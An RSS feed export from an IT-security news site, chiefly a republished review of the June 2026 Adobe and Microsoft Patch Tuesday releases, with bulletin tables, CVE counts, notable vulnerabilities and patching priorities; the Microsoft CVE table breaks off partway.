<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=kali+everywhere%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 23:15:24 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 23:15:24 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=kali+everywhere%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=kali+everywhere%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Why Russian Hackers are Everywhere]]></title>
<description><![CDATA[YouTube Video]]></description>
<link>https://tsecurity.de/de/3694609/hacking/why-russian-hackers-are-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694609/hacking/why-russian-hackers-are-everywhere/</guid>
<pubDate>Sat, 25 Jul 2026 19:03:49 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>YouTube Video</p><p><iframe loading="lazy" src="https://www.youtube.com/embed/ROf4oNqGEUc"></iframe></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The June 2026 Security Update Review]]></title>
<description><![CDATA[I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a ...]]></description>
<link>https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a look at the latest security patches from Adobe and Microsoft. If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for June 2026</strong></p><p class="">For June, Adobe released 11 bulletins addressing 123 unique CVEs in Adobe Acrobat Reader, ColdFusion, Experience Manager, Experience Manager Forms, InDesign, InCopy, Substance 3D Sampler, Content Credentials SDK, Dreamweaver, Format Plugins, and Adobe Campaign Classic. A total of 11 of these CVEs were reported through the ZDI program.</p><p class="">Here’s this month’s overview table:</p>





















  
  




  


  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/campaign/apsb26-66.html" target="_blank">APSB26-66</a></td>
    <td>Adobe Campaign Classic</td>
    <td>2</td>
    <td>Critical</td>
    <td>10.0</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-64.html" target="_blank">APSB26-64</a></td>
    <td>Adobe ColdFusion</td>
    <td>7</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-63.html" target="_blank">APSB26-63</a></td>
    <td>Adobe Acrobat Reader</td>
    <td>20</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html" target="_blank">APSB26-57</a></td>
    <td>Adobe Experience Manager Forms</td>
    <td>3</td>
    <td>Critical</td>
    <td>9.3</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/dreamweaver/apsb26-62.html" target="_blank">APSB26-62</a></td>
    <td>Adobe Dreamweaver</td>
    <td>5</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/formatplugins/apsb26-65.html" target="_blank">APSB26-65</a></td>
    <td>Adobe Format Plugins</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/incopy/apsb26-59.html" target="_blank">APSB26-59</a></td>
    <td>Adobe InCopy</td>
    <td>3</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/indesign/apsb26-58.html" target="_blank">APSB26-58</a></td>
    <td>Adobe InDesign</td>
    <td>12</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-60.html" target="_blank">APSB26-60</a></td>
    <td>Adobe Substance 3D Sampler</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/content-authenticity-sdk/apsb26-61.html" target="_blank">APSB26-61</a></td>
    <td>Content Credentials SDK</td>
    <td>8</td>
    <td>Critical</td>
    <td>7.5</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/experience-manager/apsb26-56.html" target="_blank">APSB26-56</a></td>
    <td>Adobe Experience Manager</td>
    <td>57</td>
    <td>Important</td>
    <td>5.4</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
<tfoot>
  <tr>
    <td>TOTAL</td>
    <td>11 bulletins</td>
    <td>123</td>
    <td></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</tfoot>
</table>



  
  









  <p class="">Obviously, the update for Campaign Classic should be on the top of your deployment list if you’re a user. A CVSS 10 is rare; two in the same bulletin is pretty much a unicorn. Adobe says there are no active attacks, but I would expect heavy research into creating one. The update for Coldfusion is also a Priority 1, but again, no known attacks is the wild. I suspect the Reader patch will also receive a lot of attention as malicious PDFs are common in ransomware attacks. The update for Experience Manager may be large, but it’s mostly just cross-site scripting (XSS) bugs.</p><p class=""><strong>Microsoft Patches for June 2026</strong></p><p class="">This month, Microsoft released a new record 208 CVEs Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, Github Copilot, Defender, Exchange Server, Hyper-V, Secure Boot, and BitLocker. At least, that’s my count. Microsoft’s tools seem to be having some issues, as they initially included a CVE from 2020 in this release. Regardless, the count is over 200, and I counted several times.</p><p class="">One of these bugs came through the ZDI program, but bugs submitted during Pwn2Own Berlin remain unpatched. If you include the Chromium and other third-party bugs, the total CVE count for June comes to a staggering 571 CVEs. 38 of these cases are rated Critical while the rest are rated Important in severity.</p><p class="">I’ve been counting CVEs on Patch Tuesday since 2017, and this is by far the largest monthly release in that time. The previous record was 177 set last year. It is extraordinary that Microsoft can produce so many patches in a single month, but it does raise concerns. How many of these cases were found using AI tools? How many patches were generated using AI to assist in coding or testing? What quality issues may exist in these patches? And likely most importantly, is this the new normal? The last two months were also large releases. Should sysadmins adjust their processes for prioritization and patch deployment based on this new volume of updates? Unfortunately, Microsoft is not providing those answers right now. Hopefully that changes in the future. BTW – just a note – the current number of CVEs shipped by Microsoft this year exceeds the total number of CVEs shipped in all of 2018.</p><p class="">One of the bugs patched by Microsoft this month is listed as under active exploitation and three others are listed as publicly known at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bug being exploited in the wild.</p><p class="">-   <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><strong>CVE-2026-41091</strong></a><strong> - Microsoft Defender Elevation of Privilege Vulnerability<br></strong>Since Microsoft doesn’t provide info on how widespread exploitation is, we must read some tea leaves. For this patch, several different people were acknowledged, which indicates multiple parties say this is in the wild, meaning exploitation is likely significant. The good news is that most people won’t need to take action as Defender updates itself. However, if you don’t have this configured or are in an isolated environment, you’ll need to update to the latest version.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><strong>CVE-2026-45657</strong></a><strong> - Windows Kernel Remote Code Execution Vulnerability<br></strong>This CVSS 9.8 bug allows remote, unauthenticated attackers to execute code at SYSTEM level without user interaction. Yup – this is wormable. The problem lies in the way the kernel handles TCP/IP. This was listed as “Exploitation Less Likely” by Microsoft, but rest assured that every researcher and bug shop on the planet is reversing this patch right now trying to create an exploit. Test and deploy this patch quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><strong>CVE-2026-47291</strong></a><strong> - HTTP.sys Remote Code Execution Vulnerability<br></strong>Our second CVSS 9.8 bug of the month, this also allows remote, unauthenticated attackers to execute code on affected systems without user interaction. However, there is a caveat. Systems using the default MaxRequestBytes registry value used by the Windows HTTP stack are not affected by this bug. You can edit your registry settings if you need protection while you test and deploy the patch. The bulletin includes instructions and even a PowerShell script for doing this action. Microsoft lists this as “Exploitation more likely”, so I would definitely check your registry settings.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><strong>CVE-2026-44815</strong></a><strong> - DHCP Client Service Remote Code Execution Vulnerability<br></strong>Here’s another CVSS 9.8 that has an odd incongruity. Although the CVSS says no permissions are required for exploitation, the write-up states it must be an “authenticated” user. I would err on the side of caution here and believe the CVSS. If that’s correct, then we have another bug where a remote, unauthenticated attacker could execute code on affected systems without user interaction. And since the DHCP client is on every OS, it’s a juicy target. This is another one to test and deploy with haste.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45585"><strong>CVE-2026-45585</strong></a><strong>/</strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><strong>CVE-2026-50507</strong></a><strong> - Windows BitLocker Security Feature Bypass Vulnerability<br></strong>If you’ve followed the ongoing saga of Nightmare Eclipse vs. MSRC, the bugs should look familiar. One is definitely a fix for “YellowKey”, while the other appears to be a fix for “GreenPlasma”. The researcher has promised a “<a href="https://www.theregister.com/security/2026/05/28/microsoft-0-day-feud-escalates-as-researcher-threatens-another-windows-exploit-dump/5248085">bone shattering</a>” drop on June 14, so let’s hope Microsoft is able to reach some understanding with the researcher before more 0-days are released. Also, there is a script provided by Microsoft as a mitigation, but the better strategy is to test and deploy the updates.</p><p class=""> Here’s the full list of CVEs released by Microsoft for June 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="new2026-Jun-cvrf2.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="1024">
 <col width="144">
 <col width="256">
 <col width="104" span="6">
 <tr height="47">
  <td width="144" class="xl65" height="47">CVE</td>
  <td width="256" class="xl65">Title</td>
  <td width="104" class="xl66">Severity</td>
  <td width="104" class="xl66">CVSS</td>
  <td width="104" class="xl66">Public</td>
  <td width="104" class="xl66">Exploited</td>
  <td width="104" class="xl66">XI</td>
  <td width="104" class="xl66">Type</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><span>CVE-2026-41091</span></a></td>
  <td width="256" class="xl68">Microsoft Defender
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl71">Yes</td>
  <td class="xl70">0</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49160"><span>CVE-2026-49160</span></a></td>
  <td width="256" class="xl68">HTTP.sys Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><span>CVE-2026-50507</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45586"><span>CVE-2026-45586</span></a></td>
  <td width="256" class="xl68">Windows Collaborative
  Translation Framework (CTFMON) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="91">
  <td class="xl67" height="91"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-10263"><span>CVE-2025-10263 *</span></a></td>
  <td width="256" class="xl68">ARM: CVE-2025-10263
  Completion of affected memory accesses might not be guaranteed by completion
  of a TLBI [kernel]</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48567"><span>CVE-2026-48567</span></a></td>
  <td width="256" class="xl68">Azure HorizonDB<span>  </span>Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">10</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32193"><span>CVE-2026-32193</span></a></td>
  <td width="256" class="xl68">Azure Kubernetes
  Service (AKS) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47644"><span>CVE-2026-47644</span></a></td>
  <td width="256" class="xl68">Copilot Chat
  (Microsoft Edge) Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><span>CVE-2026-44815</span></a></td>
  <td width="256" class="xl68">DHCP Client Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><span>CVE-2026-47291</span></a></td>
  <td width="256" class="xl68">HTTP.sys Remote Code
  Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42824"><span>CVE-2026-42824</span></a></td>
  <td width="256" class="xl68">M365 Copilot
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45476"><span>CVE-2026-45476</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Network Adapter Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44810"><span>CVE-2026-44810</span></a></td>
  <td width="256" class="xl68">Microsoft
  Cryptographic Services Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48579"><span>CVE-2026-48579</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Online Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47655"><span>CVE-2026-47655</span></a></td>
  <td width="256" class="xl68">Microsoft Graph
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45497"><span>CVE-2026-45497</span></a></td>
  <td width="256" class="xl68">Microsoft M365 Copilot
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45460"><span>CVE-2026-45460</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">4.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472"><span>CVE-2026-45472</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45474"><span>CVE-2026-45474</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45461"><span>CVE-2026-45461</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45463"><span>CVE-2026-45463</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45456"><span>CVE-2026-45456</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45458"><span>CVE-2026-45458</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47635"><span>CVE-2026-47635</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26142"><span>CVE-2026-26142</span></a></td>
  <td width="256" class="xl68">Nuance PowerScribe
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47289"><span>CVE-2026-47289</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47654"><span>CVE-2026-47654</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48563"><span>CVE-2026-48563</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42992"><span>CVE-2026-42992</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44799"><span>CVE-2026-44799</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44801"><span>CVE-2026-44801</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42985"><span>CVE-2026-42985</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45648"><span>CVE-2026-45648</span></a></td>
  <td width="256" class="xl68">Windows Active
  Directory Domain Services Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42987"><span>CVE-2026-42987</span></a></td>
  <td width="256" class="xl68">Windows Deployment
  Services (WDS) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33828"><span>CVE-2026-33828</span></a></td>
  <td width="256" class="xl68">Windows Device Health
  Attestation (DHA) Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44803"><span>CVE-2026-44803</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44812"><span>CVE-2026-44812</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45607"><span>CVE-2026-45607</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45641"><span>CVE-2026-45641</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47652"><span>CVE-2026-47652</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
